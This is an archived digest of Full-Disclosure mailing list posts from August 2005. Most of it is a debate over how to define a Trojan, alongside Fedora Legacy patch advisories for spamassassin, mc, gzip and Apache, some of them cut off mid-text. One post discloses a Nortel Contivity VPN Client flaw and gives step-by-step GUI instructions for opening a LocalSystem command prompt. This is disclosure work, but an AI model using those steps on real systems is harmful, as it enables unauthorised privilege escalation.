date:20050810

Ok.. In one reply you typed...

"In computers, a Trojan horse is a program in which malicious or harmful
code is contained inside apparently harmless programming or data in such a
way that it can get control and do its chosen form of damage, such as
ruining the file allocation table on your hard disk."

Below you said...

"This is part of why I'm saying that the definition of Trojan must include
the access and control that a backdoor gives."

In your reply to me earlier (First example above), The trojan can do its
damage without giving control to an outside attacker.  That's the difference
between the two.  A backdoor gives access to an outside attacker while a
Trojan doesn't.  It can however use a backdoor combined with the trojan to
deliver access.

Chuck Fullerton

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Jason Coombs
Sent: Wednesday, August 10, 2005 9:34 PM
To: James Tucker
Cc: Full-Disclosure
Subject: Re: [Full-disclosure] Re: Help put a stop to incompetent
computerforensics

James Tucker wrote:
> Sorry, how many programs which you class as "Trojans" add what you 
> define as a "backdoor", given that a "backdoor" is generally 
> pre-compiled code which allows access via previously un-announced or 
> commonly unused connection methods? Malware doesn't typically ADD 
> backdoors, it comes shipped with them, thus the classification 
> Trojan.Backdoor, as opposed to just Trojan. Many of the more common 
> Trojans these days are Worms, Trojans, and Backdoors and some are Viri 
> too. The reason is simple - short of breaking the kernel process 
> scheduler it is useful to be a Trojan when present as an active virus.
> Similarly due to the current nature of desktop and server side 
> application logic, most viri are unsuccessful without being worms - 
> although this may change in a few decades as applications become more 
> data driven and automatic. Nothing will ever substitute a full 
> description of a particular malware's actions in describing what it 
> does, unless you expect malware authors to start conforming to 
> standards.

Applying the broader definition of Trojan, I can't even make sense out of
your paragraph above. But I know that you aren't using the term to
communicate the idea of malware that enables the attacker to gain control
over, and future access to, the infected system ... If that's the definition
you had in mind, then the paragraph you wrote makes logical sense.
Otherwise, not.

I agree that calling it a backdoor isn't comfortable, it just doesn't fit.
This is part of why I'm saying that the definition of Trojan must include
the access and control that a backdoor gives.

It doesn't make sense to me that "Many of the more common Trojans these days
are Worms, Trojans, and Backdoors ..." unless you are using Trojan to
communicate the feature of remote access to the infected box.

Sincerely,

Jason Coombs
[EMAIL PROTECTED]
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Privilege escalation in Nortel Contivity VPN Client V05_01.030

2005-08-10 Thread Jeff Peadro

Summary:
Privilege escalation in Nortel Contivity VPN Client V05_01.030
(http://www.nortel.com)

Details:
The Contivity VPN Client is a Windows application that lets you define
and store connection information for accessing your corporate network
through a Contivity Secure IP Services Gateway.  When the Contivity
client is running as a service it is possible to manipulate the
interface of the client and escalate privileges to that of the
LocalSystem account.

Vulnerable Versions:
Nortel Contivity VPN Client V05_01.030

Patches/Workarounds:
The vendor was notified of the issue and an updated version has been released.

Exploit:

1. With the Contivity client open click on Options and select
Authentication Options.

2. Select Digital Certificate Authentication Entrust and click OK.

3. To the right of the certificate box click the button icon and select open.

4. Change Files of type: to All Files, navigate to the system32
directory andlocate cmd.exe. Right click cmd.exe and choose Open.

It should also be noted that this exploit can be carried out by
running the connection wizard and following steps 2-4.

The result is a command prompt running under the context of the
LocalSystem account.

Discovered by Jeff Peadro Jeff.Peadro[at]gmail[dot]com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Re: Help put a stop to incompetent computer forensics


James Tucker wrote:

Sorry, how many programs which you class as "Trojans" add what you
define as a "backdoor", given that a "backdoor" is generally
pre-compiled code which allows access via previously un-announced or
commonly unused connection methods? Malware doesn't typically ADD
backdoors, it comes shipped with them, thus the classification
Trojan.Backdoor, as opposed to just Trojan. Many of the more common
Trojans these days are Worms, Trojans, and Backdoors and some are Viri
too. The reason is simple - short of breaking the kernel process
scheduler it is useful to be a Trojan when present as an active virus.
Similarly due to the current nature of desktop and server side
application logic, most viri are unsuccessful without being worms -
although this may change in a few decades as applications become more
data driven and automatic. Nothing will ever substitute a full
description of a particular malware's actions in describing what it
does, unless you expect malware authors to start conforming to
standards.



Applying the broader definition of Trojan, I can't even make sense out 
of your paragraph above. But I know that you aren't using the term to 
communicate the idea of malware that enables the attacker to gain 
control over, and future access to, the infected system ... If that's 
the definition you had in mind, then the paragraph you wrote makes 
logical sense. Otherwise, not.


I agree that calling it a backdoor isn't comfortable, it just doesn't 
fit. This is part of why I'm saying that the definition of Trojan must 
include the access and control that a backdoor gives.


It doesn't make sense to me that "Many of the more common Trojans these 
days are Worms, Trojans, and Backdoors ..." unless you are using Trojan 
to communicate the feature of remote access to the infected box.


Sincerely,

Jason Coombs
[EMAIL PROTECTED]
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Re: Help put a stop to incompetent computerforensics


Chuck Fullerton wrote:

"A Trojan horse is a program that appears to have some useful or benign
purpose, but really masks some hidden malicious functionality."

"A Backdoor is a program that allows attackers to bypass normal security
controls on a system, gaining access on the attacker's own terms." 


Here's an example of a completely flawed explanation of the origin of 
the term. The definition given claims that the warriors emerged from the 
horse and only those warriors overran the city. Obviously that isn't 
what happened in the Iliad, the Trojan Horse was used to get further 
access for other warriors. Furthermore, "overran the city" means of 
course that the Trojan Horse was used for the purpose of gaining control 
of the city, regardless of which warriors accomplished the objective.


Most (but not all) of you are suggesting that the only thing that 
matters is what the definitions say, and that's not the right way to 
look at this issue. A program that does something malicious when used is 
not a Trojan unless its malicious purpose fits with the story of the 
Trojan Horse as it is understood by non-computer people. This is why we 
don't call spyware Trojans any longer -- a distinction has been drawn, 
and that distinction has overrun the past usage of the term.


http://searchsecurity.techtarget.com/sDefinition/0,,sid14_gci213221,00.html

In computers, a Trojan horse is a program in which malicious or harmful 
code is contained inside apparently harmless programming or data in such 
a way that it can get control and do its chosen form of damage, such as 
ruining the file allocation table on your hard disk. In one celebrated 
case, a Trojan horse was a program that was supposed to find and destroy 
computer viruses. A Trojan horse may be widely redistributed as part of 
a computer virus.


The term comes from Greek mythology about the Trojan War, as told in the 
Aeneid by Virgil and mentioned in the Odyssey by Homer. According to 
legend, the Greeks presented the citizens of Troy with a large wooden 
horse in which they had secretly hidden their warriors. During the 
night, the warriors emerged from the wooden horse and overran the city.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

RE: [Full-disclosure] Re: Help put a stop to incompetent computerforensics

To Quote Ed Skoudis' "Malware: Fighting Malicious Code"

"A Trojan horse is a program that appears to have some useful or benign
purpose, but really masks some hidden malicious functionality."

"A Backdoor is a program that allows attackers to bypass normal security
controls on a system, gaining access on the attacker's own terms." 

What this means is that many times they are found together but a Trojan is
not necessarily a backdoor and a backdoor is not necessarily a trojan.

In the case Jason was saying the Trojan was forcing the use of the Backdoor.

Does this clear it up at all?

Chuck Fullerton
CEH, OPST, CISSP

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Jason Coombs
Sent: Wednesday, August 10, 2005 8:59 PM
To: Donald J. Ankney
Cc: Full-Disclosure
Subject: Re: [Full-disclosure] Re: Help put a stop to incompetent
computerforensics

Donald J. Ankney wrote:
> Your definition is just a subset of the standard, broader one. 

When a word causes widespread misunderstanding such that you simply can't
use it to communicate ideas clearly, the old meaning becomes archaic. I
think that's what has happened with Trojan. Proof of this can be found in
the list of malware that anti-Trojan software is designed to detect --
without double-checking this, just from memory, I'm going to say that the
list of malware detected by the typical anti-Trojan software product is
limited to malware that meets my definition and does not include the broader
definition. That causes a real problem, in practice, since if the
anti-Trojan doesn't stop spyware then how can spyware be a Trojan?

Regards,

Jason Coombs
[EMAIL PROTECTED]
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Re: Help put a stop to incompetent computer fore nsics

2005-08-10 Thread Fergie (Paul Ferguson)

*plonk*

--filtered--


[snip]

Jason Coombs
[EMAIL PROTECTED]

[snip]


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Re: Help put a stop to incompetent computer forensics


Donald J. Ankney wrote:
Your definition is just a subset of the standard, broader one. 


When a word causes widespread misunderstanding such that you simply 
can't use it to communicate ideas clearly, the old meaning becomes 
archaic. I think that's what has happened with Trojan. Proof of this can 
be found in the list of malware that anti-Trojan software is designed to 
detect -- without double-checking this, just from memory, I'm going to 
say that the list of malware detected by the typical anti-Trojan 
software product is limited to malware that meets my definition and does 
not include the broader definition. That causes a real problem, in 
practice, since if the anti-Trojan doesn't stop spyware then how can 
spyware be a Trojan?


Regards,

Jason Coombs
[EMAIL PROTECTED]
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Re: Help put a stop to incompetent computer forensics


Thierry Zoller wrote:

JC> Because Trojan horses often have
JC> these harmful functions, there often arises the misunderstanding that
^   
JC> such functions define a Trojan Horse.

Please read what you just posted, it directly contradicts what
that wikipedia author wrote 2 lines above that. That wikipedia
article can be trashed.


It is not a misunderstanding. The definition of Trojan has very clearly 
been relegated to the malware that forces open a means of unauthorized 
or hidden access or remote control, i.e. a backdoor. I understand your 
point that Trojan had a broader definition in the past, but that is in 
the past. Archaic. The Wikipedia entry is instructive to illustrate that 
there is so often a "misunderstanding" in present usage that the older 
definition is no longer correct.


We won't succeed in attempts to convince millions of people that a 
Trojan Horse is also a gift that contains a nuclear bomb inside that 
will nuke your house after you accept it. That's not a Trojan, that's a 
bomb, even if it is a Greek wooden horse. It just doesn't matter that in 
the past the industry had not yet come to realize that it needed a 
different term for spyware. We have it now, so there's no looking back.


Thanks for helping me understand your viewpoint. I've never met anyone 
who thinks of a Trojan the way that you do, and the common usage even by 
infosec industry professionals clouded my brain so badly that at no time 
did I perceive the classic definitions you and others have cited to 
imply anything other than the context in which the term is used today. 
The bad acts that the Trojan performs, in my mind, must be in connection 
with some attempt to give the Trojan author further, future access to 
systems or to the data they contain.


I'm not saying that you're wrong. I'm saying you have far too much 
experience and expertise, and all that knowledge is causing you to fail 
to see the forest for the trees. Common people's common sense has 
changed the definition of Trojan, pure and simple.


Nobody today would avoid using the term spyware just because the term 
Trojan was the way in which that malware would have been labeled in the 
past. As I said, everyone I know understands what a Trojan is, and their 
understanding is not what you suggest it should be.


Sincerely,

Jason Coombs
[EMAIL PROTECTED]
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [FLSA-2005:129284] Updated spamassassin package fixes security issue

-
   Fedora Legacy Update Advisory

Synopsis:  Updated spamassassin package fixes security issue
Advisory ID:   FLSA:129284
Issue date:2005-08-10
Product:   Fedora Core
Keywords:  Bugfix
CVE Names: CAN-2004-0796
-


-
1. Topic:

An updated spamassassin package that fixes a denial of service bug when
parsing malformed messages is now available.

SpamAssassin provides a way to reduce unsolicited commercial email
(SPAM) from incoming email.

2. Relevant releases/architectures:

Fedora Core 2 - i386

3. Problem description:

A denial of service bug has been found in SpamAssassin versions below
2.64. A malicious attacker could construct a message in such a way that
would cause spamassassin to stop responding, potentially preventing the
delivery or filtering of email. The Common Vulnerabilities and Exposures
project (cve.mitre.org) has assigned the name CAN-2004-0796 to this
issue.

Users of SpamAssassin should update to these updated packages which
contain an updated version and is not vulnerable to this issue.

4. Solution:

Before applying this update, make sure all previously released errata
relevant to your system have been applied.

To update all RPMs for your particular architecture, run:

rpm -Fvh [filenames]

where [filenames] is a list of the RPMs you wish to upgrade.  Only those
RPMs which are currently installed will be updated.  Those RPMs which
are not installed but included in the list will not be updated.  Note
that you can also use wildcards (*.rpm) if your current directory *only*
contains the desired RPMs.

Please note that this update is also available via yum and apt.  Many
people find this an easier way to apply updates.  To use yum issue:

yum update

or to use apt:

apt-get update; apt-get upgrade

This will start an interactive process that will result in the
appropriate RPMs being upgraded on your system.  This assumes that you
have yum or apt-get configured for obtaining Fedora Legacy content.
Please visit http://www.fedoralegacy.org/docs for directions on how to
configure yum and apt-get.

5. Bug IDs fixed:

https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=129284

6. RPMs required:

Fedora Core 2:

SRPM:
http://download.fedoralegacy.org/fedora/2/updates/SRPMS/spamassassin-2.64-2.1.legacy.src.rpm

i386:
http://download.fedoralegacy.org/fedora/2/updates/i386/spamassassin-2.64-2.1.legacy.i386.rpm


7. Verification:

SHA1 sum Package Name
-

6b7fbf447dce761c6dc6c85df6cc336cb31a939a
fedora/2/updates/i386/spamassassin-2.64-2.1.legacy.i386.rpm
8808655655b574f905a0308f0a0eca0c5e7d09c8
fedora/2/updates/SRPMS/spamassassin-2.64-2.1.legacy.src.rpm

These packages are GPG signed by Fedora Legacy for security.  Our key is
available from http://www.fedoralegacy.org/about/security.php

You can verify each package with the following command:

rpm --checksig -v 

If you only wish to verify that each package has not been corrupted or
tampered with, examine only the sha1sum with the following command:

sha1sum 

8. References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0796

9. Contact:

The Fedora Legacy security contact is <[EMAIL PROTECTED]>. More
project details at http://www.fedoralegacy.org

-


signature.asc
Description: OpenPGP digital signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [FLSA-2005:152889] Updated mc packages fix security issues

-
   Fedora Legacy Update Advisory

Synopsis:  Updated mc packages fix security issues
Advisory ID:   FLSA:152889
Issue date:2005-08-10
Product:   Red Hat Linux, Fedora Core
Keywords:  Bugfix
CVE Names: CAN-2004-0226 CAN-2004-0231 CAN-2004-0232
   CAN-2004-0494 CAN-2004-1004 CAN-2004-1005
   CAN-2004-1009 CAN-2004-1090 CAN-2004-1091
   CAN-2004-1092 CAN-2004-1093 CAN-2004-1174
   CAN-2004-1175 CAN-2004-1176 CAN-2005-0763
-


-
1. Topic:

Updated mc packages that fix several security issues are now available.

Midnight Commander is a visual shell much like a file manager.

2. Relevant releases/architectures:

Red Hat Linux 7.3 - i386
Red Hat Linux 9 - i386
Fedora Core 1 - i386
Fedora Core 2 - i386

3. Problem description:

Several buffer overflows, several temporary file creation
vulnerabilities, and one format string vulnerability have been
discovered in Midnight Commander. These vulnerabilities were discovered
mostly by Andrew V. Samoilov and Pavel Roskin. The Common
Vulnerabilities and Exposures project (cve.mitre.org) has assigned the
names CAN-2004-0226, CAN-2004-0231, and CAN-2004-0232 to these issues.

Shell escape bugs have been discovered in several of the mc vfs backend
scripts. An attacker who is able to influence a victim to open a
specially-crafted URI using mc could execute arbitrary commands as the
victim. The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CAN-2004-0494 to this issue.

Several format string bugs were found in Midnight Commander. If a user
is tricked by an attacker into opening a specially crafted path with mc,
it may be possible to execute arbitrary code as the user running
Midnight Commander. The Common Vulnerabilities and Exposures project
(cve.mitre.org) has assigned the name CAN-2004-1004 to this issue.

Several buffer overflow bugs were found in Midnight Commander. If a user
is tricked by an attacker into opening a specially crafted file or path
with mc, it may be possible to execute arbitrary code as the user
running Midnight Commander. The Common Vulnerabilities and Exposures
project (cve.mitre.org) has assigned the name CAN-2004-1005 to this
issue.

Several denial of service bugs were found in Midnight Commander. These
bugs could cause Midnight Commander to hang or crash if a victim opens a
carefully crafted file. The Common Vulnerabilities and Exposures project
(cve.mitre.org) has assigned the names CAN-2004-1009, CAN-2004-1090,
CAN-2004-1091, CAN-2004-1092, CAN-2004-1093 and CAN-2004-1174 to these
issues.

A filename quoting bug was found in Midnight Commander's FISH protocol
handler. If a victim connects via embedded SSH support to a host
containing a carefully crafted filename, arbitrary code may be executed
as the user running Midnight Commander. The Common Vulnerabilities and
Exposures project (cve.mitre.org) has assigned the name CAN-2004-1175 to
this issue.

A buffer underflow bug was found in Midnight Commander. If a malicious
local user is able to modify the extfs.ini file, it could be possible to
execute arbitrary code as a user running Midnight Commander. The Common
Vulnerabilities and Exposures project (cve.mitre.org) has assigned the
name CAN-2004-1176 to this issue.

A buffer overflow bug was found in the way Midnight Commander handles
directory completion. If a victim uses completion on a maliciously
crafted directory path, it is possible for arbitrary code to be executed
as the user running Midnight Commander. The Common Vulnerabilities and
Exposures project (cve.mitre.org) has assigned the name CAN-2005-0763 to
this issue.

Users of mc are advised to upgrade to these packages, which contain
backported security patches to correct these issues.

4. Solution:

Before applying this update, make sure all previously released errata
relevant to your system have been applied.

To update all RPMs for your particular architecture, run:

rpm -Fvh [filenames]

where [filenames] is a list of the RPMs you wish to upgrade.  Only those
RPMs which are currently installed will be updated.  Those RPMs which
are not installed but included in the list will not be updated.  Note
that you can also use wildcards (*.rpm) if your current directory *only*
contains the desired RPMs.

Please note that this update is also available via yum and apt.  Many
people find this an easier way to apply updates.  To use yum issue:

yum update

or to use apt:

apt-get update; apt-get upgrade

This will start an interactive process that will result in the
appropriate RPMs being upgraded on your system.  This assumes that you
have yum or apt-get configured for obtaining Fedora Legacy content.
Please visit http://www.fedoralegacy.org/docs f

[Full-disclosure] [FLSA-2005:157696] Updated gzip package fixes security issues

-
   Fedora Legacy Update Advisory

Synopsis:  Updated gzip package fixes security issues
Advisory ID:   FLSA:157696
Issue date:2005-08-10
Product:   Red Hat Linux, Fedora Core
Keywords:  Bugfix
CVE Names: CAN-2005-0758 CAN-2005-0988 CAN-2005-1228
-


-
1. Topic:

An updated gzip package is now available.

The gzip package contains the GNU gzip data compression program.

2. Relevant releases/architectures:

Red Hat Linux 7.3 - i386
Red Hat Linux 9 - i386
Fedora Core 1 - i386
Fedora Core 2 - i386

3. Problem description:

A bug was found in the way zgrep processes file names. If a user can be
tricked into running zgrep on a file with a carefully crafted file name,
arbitrary commands could be executed as the user running zgrep. The
Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CAN-2005-0758 to this issue.

A bug was found in the way gunzip modifies permissions of files being
decompressed. A local attacker with write permissions in the directory
in which a victim is decompressing a file could remove the file being
written and replace it with a hard link to a different file owned by the
victim, gunzip then gives the linked file the permissions of the
uncompressed file. The Common Vulnerabilities and Exposures project
(cve.mitre.org) has assigned the name CAN-2005-0988 to this issue.

A directory traversal bug was found in the way gunzip processes the -N
flag. If a victim decompresses a file with the -N flag, gunzip fails to
sanitize the path which could result in a file owned by the victim being
overwritten. The Common Vulnerabilities and Exposures project
(cve.mitre.org) has assigned the name CAN-2005-1228 to this issue.

Users of gzip should upgrade to this updated package, which contains
backported patches to correct these issues.

4. Solution:

Before applying this update, make sure all previously released errata
relevant to your system have been applied.

To update all RPMs for your particular architecture, run:

rpm -Fvh [filenames]

where [filenames] is a list of the RPMs you wish to upgrade.  Only those
RPMs which are currently installed will be updated.  Those RPMs which
are not installed but included in the list will not be updated.  Note
that you can also use wildcards (*.rpm) if your current directory *only*
contains the desired RPMs.

Please note that this update is also available via yum and apt.  Many
people find this an easier way to apply updates.  To use yum issue:

yum update

or to use apt:

apt-get update; apt-get upgrade

This will start an interactive process that will result in the
appropriate RPMs being upgraded on your system.  This assumes that you
have yum or apt-get configured for obtaining Fedora Legacy content.
Please visit http://www.fedoralegacy.org/docs for directions on how to
configure yum and apt-get.

5. Bug IDs fixed:

https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=157696

6. RPMs required:

Red Hat Linux 7.3:
SRPM:
http://download.fedoralegacy.org/redhat/7.3/updates/SRPMS/gzip-1.3.3-1.2.legacy.src.rpm

i386:
http://download.fedoralegacy.org/redhat/7.3/updates/i386/gzip-1.3.3-1.2.legacy.i386.rpm

Red Hat Linux 9:

SRPM:
http://download.fedoralegacy.org/redhat/9/updates/SRPMS/gzip-1.3.3-9.2.legacy.src.rpm

i386:
http://download.fedoralegacy.org/redhat/9/updates/i386/gzip-1.3.3-9.2.legacy.i386.rpm

Fedora Core 1:

SRPM:
http://download.fedoralegacy.org/fedora/1/updates/SRPMS/gzip-1.3.3-11.2.legacy.src.rpm

i386:
http://download.fedoralegacy.org/fedora/1/updates/i386/gzip-1.3.3-11.2.legacy.i386.rpm

Fedora Core 2:

SRPM:
http://download.fedoralegacy.org/fedora/2/updates/SRPMS/gzip-1.3.3-12.2.legacy.src.rpm

i386:
http://download.fedoralegacy.org/fedora/2/updates/i386/gzip-1.3.3-12.2.legacy.i386.rpm


7. Verification:

SHA1 sum Package Name
-

16a19e2142d83f1db86dbf5a9a5a0b4e35d50c92
redhat/7.3/updates/i386/gzip-1.3.3-1.2.legacy.i386.rpm
98e5fcc727442dd531277cffc2771b7bc8d5f1f8
redhat/7.3/updates/SRPMS/gzip-1.3.3-1.2.legacy.src.rpm
7960019da89fbdee222e71b7d9884e6dc9ed3056
redhat/9/updates/i386/gzip-1.3.3-9.2.legacy.i386.rpm
de3e4e8dd934c383feb2a464b522c4e62bdd3f6d
redhat/9/updates/SRPMS/gzip-1.3.3-9.2.legacy.src.rpm
b5cc020182af4b945a461c35e1adc3ddb15e953b
fedora/1/updates/i386/gzip-1.3.3-11.2.legacy.i386.rpm
28c8700ac53cb6f8110c744ffc8456095cf9d051
fedora/1/updates/SRPMS/gzip-1.3.3-11.2.legacy.src.rpm
3d056ec2af5e344ef56e22049e5bd196f0c27180
fedora/2/updates/i386/gzip-1.3.3-12.2.legacy.i386.rpm
f6b4d52075528761fd56e44c8227c45130f959b0
fedora/2/updates/SRPMS/gzip-1.3.3-12.2.legacy.src.rpm

These packages are GPG signed by Fedora Legacy for security.  Our key is
available from http

[Full-disclosure] [FLSA-2005:157701] Updated Apache httpd packages fix security issues

-
Fedora Legacy Update Advisory

Synopsis: Updated Apache httpd packages fix security issues
Advisory ID: FLSA:157701
Issue date:2005-08-10
Product: Red Hat Linux, Fedora Core
Keywords: Bugfix
CVE Names: CAN-2005-1268 CAN-2005-1344 CAN-2005-2088
-

-
1. Topic:

Updated Apache httpd packages to correct security issues are now
available.

The Apache HTTP Server is a powerful, full-featured, efficient, and
freely-available Web server.

2. Relevant releases/architectures:

Red Hat Linux 7.3 - i386
Red Hat Linux 9 - i386
Fedora Core 1 - i386
Fedora Core 2 - i386

3. Problem description:

Watchfire reported a flaw that occured when using the Apache server as
an HTTP proxy. A remote attacker could send an HTTP request with both a
"Transfer-Encoding: chunked" header and a "Content-Length" header. This
caused Apache to incorrectly handle and forward the body of the request
in a way that the receiving server processes it as a separate HTTP
request. This could allow the bypass of Web application firewall
protection or lead to cross-site scripting (XSS) attacks. The Common
Vulnerabilities and Exposures project (cve.mitre.org) assigned the name
CAN-2005-2088 to this issue.

A buffer overflow was discovered in htdigest that may allow an attacker
to execute arbitrary code. Since htdigest is usually only accessible
locally, the impact of this issue is low. The Common Vulnerabilities and
Exposures project (cve.mitre.org) assigned the name CAN-2005-1344 to
this issue.

Marc Stern reported an off-by-one overflow in the mod_ssl CRL
verification callback. In order to exploit this issue the Apache server
would need to be configured to use a malicious certificate revocation
list (CRL). The Common Vulnerabilities and Exposures project
(cve.mitre.org) assigned the name CAN-2005-1268 to this issue.

Users of Apache httpd should update to these errata packages that
contain backported patches to correct these issues.

4. Solution:

Before applying this update, make sure all previously released errata
relevant to your system have been applied.

To update all RPMs for your particular architecture, run:

rpm -Fvh [filenames]

where [filenames] is a list of the RPMs you wish to upgrade. Only those
RPMs which are currently installed will be updated. Those RPMs which
are not installed but included in the list will not be updated. Note
that you can also use wildcards (*.rpm) if your current directory *only*
contains the desired RPMs.

Please note that this update is also available via yum and apt. Many
people find this an easier way to apply updates. To use yum issue:

yum update

or to use apt:

apt-get update; apt-get upgrade

This will start an interactive process that will result in the
appropriate RPMs being upgraded on your system. This assumes that you
have yum or apt-get configured for obtaining Fedora Legacy content.
Please visit http://www.fedoralegacy.org/docs for directions on how to
configure yum and apt-get.

5. Bug IDs fixed:

https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=157701

6. RPMs required:

Red Hat Linux 7.3:
SRPM:
http://download.fedoralegacy.org/redhat/7.3/updates/SRPMS/apache-1.3.27-8.legacy.src.rpm

i386:
http://download.fedoralegacy.org/redhat/7.3/updates/i386/apache-1.3.27-8.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/apache-devel-1.3.27-8.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/apache-manual-1.3.27-8.legacy.i386.rpm

Red Hat Linux 9:

SRPM:
http://download.fedoralegacy.org/redhat/9/updates/SRPMS/httpd-2.0.40-21.18.legacy.src.rpm

i386:
http://download.fedoralegacy.org/redhat/9/updates/i386/httpd-2.0.40-21.18.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/httpd-devel-2.0.40-21.18.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/httpd-manual-2.0.40-21.18.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/mod_ssl-2.0.40-21.18.legacy.i386.rpm

Fedora Core 1:

SRPM:
http://download.fedoralegacy.org/fedora/1/updates/SRPMS/httpd-2.0.51-1.7.legacy.src.rpm

i386:
http://download.fedoralegacy.org/fedora/1/updates/i386/httpd-2.0.51-1.7.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/httpd-devel-2.0.51-1.7.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/httpd-manual-2.0.51-1.7.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/mod_ssl-2.0.51-1.7.legacy.i386.rpm

Fedora Core 2:

SRPM:
http://download.fedoralegacy.org/fedora/2/updates/SRPMS/httpd-2.0.51-2.9.2.legacy.src.rpm

i386:
http://download.fedoralegacy.org/fedora/2/updates/i386/httpd-2.0.51-2.9.2.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/2/updates/i386/httpd-devel-2.0.51-2.9.2.legacy.i3

RE: [Full-disclosure] Re: Help put a stop to incompetent computerforensics

2005-08-10 Thread hummer




Can we 
agree that in the world of computer security the Trojan horse is a 
malicious program disguised as a legitimate software and let it go at 
that?
 
Thanks
 

Hummer Marchand, GCIH,CISSP CompTIA Security+ 


  -Original Message-From: 
  [EMAIL PROTECTED] 
  [mailto:[EMAIL PROTECTED]On Behalf Of Donald 
  J. AnkneySent: Wednesday, August 10, 2005 5:20 PMTo: 
  [EMAIL PROTECTED]Cc: Full-Disclosure; Thierry 
  ZollerSubject: Re: [Full-disclosure] Re: Help put a stop to 
  incompetent computerforensicsWikipedia:
  
  In the context of computer 
  software, a Trojan horse is a malicious program that is disguised as 
  legitimate software. The term is derived from the classical myth of the 
  Trojan 
  horse. In the siege of 
  Troy, the 
  Greeks left a large 
  wooden horse outside the city. The Trojans were convinced that it was a gift, 
  and moved the horse to a place within the city walls. It turned out that the 
  horse was hollow, containing Greek soldiers who opened the city gates of Troy 
  at night, making it possible for the Greek army to pillage the city. Trojan 
  horse programs work in a similar way: they may look useful or interesting (or 
  at the very least harmless) to an unsuspecting user, but are actually harmful 
  when executed.
  
  http://en.wikipedia.org/wiki/Trojan_horse_%28computing%29
  
  Your definition is just a 
  subset of the standard, broader one. 
  
  
  
  On Aug 10, 2005, at 3:43 PM, Jason Coombs wrote:
  
[EMAIL PROTECTED] wrote:

  On Thu, Aug 11, 2005 at 12:26:23AM +0200, Thierry 
  Zoller wrote:
  
The industry definition is perfectly within 
Homers defintion of a Trojan
horse. 

JC> http://classics.mit.edu/Homer/iliad.html
  When I read Homer, it was a Greek 
horse.


The horse became the property of the Trojans before 
it launched its hidden attack, but your point is interesting as well.

There are other terms used to describe malware 
disguised as something else that has hidden capability to cause damage. 
Logic bomb, for example.

I'll do some more work on this and see where it 
leads. The proposal of "backdoor" as the better term just doesn't work, 
since a backdoor is a hidden mechanism for gaining entry or control of a 
system that is built into the system by its creator or some other involved 
party. An intruder may open up a backdoor in a system by altering its 
programming rather than by planting a Trojan, so there needs to be a 
distinction between the two.

Cheers,

Jason Coombs
[EMAIL PROTECTED]
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Re: Help put a stop to incompetent computer forensics

2005-08-10 Thread Technica Forensis

> From:
> 
> http://en.wikipedia.org/wiki/Trojan_horse_%28computing%29
> 
> In practice, Trojan Horses in the wild do contain spying functions (such
> as a Packet sniffer) or backdoor functions that allow a computer,
> unbeknownst to the owner, to be remotely controlled remotely from the
> network, creating a "zombie_computer". Because Trojan horses often have
> these harmful functions, there often arises the misunderstanding that
> such functions define a Trojan Horse.

Jason, you just posted a quote that contradicts your stance.  You are
now officially fighting yourself.
This quote says exactly what Thierry has been telling you: 
"In practice, Trojan Horses in the wild do contain [[the stuff Jason
said they do]].  Because Trojan horses often [[do the things Jason
said they do]], there often arises the misunderstanding that [[Jason's
definition]] define[s] a Trojan Horse."

This last sentence is saying that people often think that since a
trojan is often a backdoor that all trojans are backdoors, when in
fact the definition of a trojan is much broader.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

